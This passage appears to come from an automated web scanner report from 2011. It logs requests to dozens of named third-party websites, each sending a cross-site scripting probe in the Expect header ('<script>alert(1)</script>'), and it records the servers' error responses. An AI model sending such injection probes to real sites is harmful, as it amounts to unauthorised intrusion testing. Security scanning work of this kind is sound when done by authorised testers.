User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.321chat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:33:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.12. http://www.670kboi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.670kboi.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.670kboi.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:20:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 69
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDQQBRABAA=BNHOIALDDAGEHAJJKBFMKNBA; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021e0745525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.670kboi.com:80/favicon.ico

29.13. http://www.a-zlyrics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.a-zlyrics.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.a-zlyrics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


29.14. http://www.abacus24-7.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abacus24-7.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.abacus24-7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:02:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.15. http://www.activerideshop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.activerideshop.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.activerideshop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:00:16 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.16. http://www.adasheriff.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adasheriff.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adasheriff.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:27:12 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.17. http://www.africansafariwildlifepark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.africansafariwildlifepark.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.africansafariwildlifepark.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.1
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:17:54 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.18. http://www.agilone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agilone.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.agilone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:55:04 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

29.19. http://www.alice18club.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alice18club.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alice18club.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 23:21:22 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.20. http://www.all-celeb-fakes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.all-celeb-fakes.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.all-celeb-fakes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Wed, 04 May 2011 02:47:29 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>

29.21. http://www.alpineaccess.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alpineaccess.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alpineaccess.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Connection: close
Content-Type: text/html
Content-Length: 363
Date: Wed, 04 May 2011 02:08:23 GMT
Server: lighttpd/1.4.20

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.22. http://www.alzheimersrxtreatment.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alzheimersrxtreatment.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alzheimersrxtreatment.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:36:15 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.23. http://www.amdsurveys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amdsurveys.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amdsurveys.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:19:19 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.24. http://www.amedisys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amedisys.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amedisys.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 2558
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:04:39 GMT

<html>
<head>
<title>Amedisys Home Health Care - Page Not Found</title>
<style type="text/css">

.style1 {
   font-family: Trebuchet, "Trebuchet MS", Arial, Helvetica, sans-serif;
   font-size: 22
...[SNIP]...

29.25. http://www.apartmentwiz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentwiz.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartmentwiz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:52:59 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.26. http://www.apogee.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apogee.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apogee.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:59:04 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.27. http://www.architecturaldesigns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.architecturaldesigns.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.architecturaldesigns.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:08:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.28. http://www.armedservicesjobs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armedservicesjobs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.armedservicesjobs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:50:34 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.29. http://www.asstatic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asstatic.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.asstatic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 04 May 2011 01:24:45 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

29.30. http://www.assurance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.assurance.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.assurance.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:58:35 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Vary: Accept-Encoding

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.31. http://www.aventiumcard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aventiumcard.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aventiumcard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:42:36 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.32. http://www.azdventuresbooks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.azdventuresbooks.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.azdventuresbooks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Unknown
Content-Type: text/html
Date: Wed, 04 May 2011 01:44:39 GMT
Content-Length: 60
Set-Cookie: 7s51872mp2=805470218.20480.0000; path=/
Connection: close

The page cannot be displayed because the expectation failed.

29.33. http://www.beam.to/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beam.to
Path:   /

Request

GET / HTTP/1.1
Host: www.beam.to
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:14:58 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

29.34. http://www.beam.to/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beam.to
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beam.to
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:12:12 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

29.35. http://www.bettycrockerstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bettycrockerstore.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bettycrockerstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="CAO DSP COR CURa ADMi DEVi OUR BUS UNI STA", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:19:41 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.36. http://www.bigotires.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigotires.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigotires.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:22:14 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.37. http://www.binkyswoodworking.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.binkyswoodworking.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.binkyswoodworking.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:02:57 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:01:12 GMT
ETag: "169bb0d-4e4-486ced93a17fb"
Vary: Accept-Encoding
Content-Length: 1252
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>
   
   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.38. http://www.biz-stay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biz-stay.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biz-stay.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:09:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.39. http://www.blackcaramel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackcaramel.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackcaramel.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.1
Date: Wed, 04 May 2011 02:54:00 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive
Keep-Alive: timeout=45

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.0.1</center>
</body>
</html>

29.40. http://www.blackdoctor.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackdoctor.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackdoctor.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:58:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.41. http://www.blackebonygirl.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackebonygirl.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackebonygirl.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.1
Date: Wed, 04 May 2011 02:56:31 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive
Keep-Alive: timeout=45

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.0.1</center>
</body>
</html>

29.42. http://www.blacklight.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blacklight.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blacklight.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Wed, 04 May 2011 03:17:58 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 04 May 2011 03:17:58 GMT
Content-Type: text/html
Content-Length: 168

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 400</P><P>Reason: Expect header value is not set to 100-continue</P></BODY></HTML>

29.43. http://www.bonati.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bonati.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bonati.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:29:20 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.44. http://www.bongotones.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bongotones.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bongotones.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:30:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.45. http://www.booktv.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booktv.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.booktv.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:11:49 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.46. http://www.bootbay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bootbay.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bootbay.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Set-Cookie: .ASPXANONYMOUS=9NJ2eaZHzgEkAAAAMTUwODQwMzAtZGMwNS00NzQwLWJkODItNDJiYTc2OWNjZTE30Pxx8KUnlwQvi3xFVHH21Necx901; expires=Fri, 03-May-2013 02:32:36 GMT; path=/; HttpOnly
X-UA-Compatible: IE=EmulateIE7
Server: lighttpd/2.0.0
Date: Wed, 04 May 2011 02:32:36 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

29.47. http://www.brainshark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brainshark.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brainshark.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 6234
Content-Type: text/html
Expires: Tue, 01 Jan 1980 05:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAADSDQBT=JLPJNBFALGBNJLFMBDFKDMGE; path=/
P3P: CP="NON DSP COR ADM DEV PSA IVA CONi TELi OUR BUS NAV"
Date: Wed, 04 May 2011 02:26:53 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Brainshark - Page Not Found</title>
<li
...[SNIP]...

29.48. http://www.brandsmartusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brandsmartusa.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brandsmartusa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:14:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.49. http://www.brenhambanner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brenhambanner.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brenhambanner.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Wed, 04 May 2011 03:47:38 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: brenhambanner.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.50. http://www.brighamandwomens.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brighamandwomens.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brighamandwomens.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:57:21 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.51. http://www.brisksearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brisksearch.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brisksearch.com
Accept: */*
Proxy-Connection: Keep-Alive
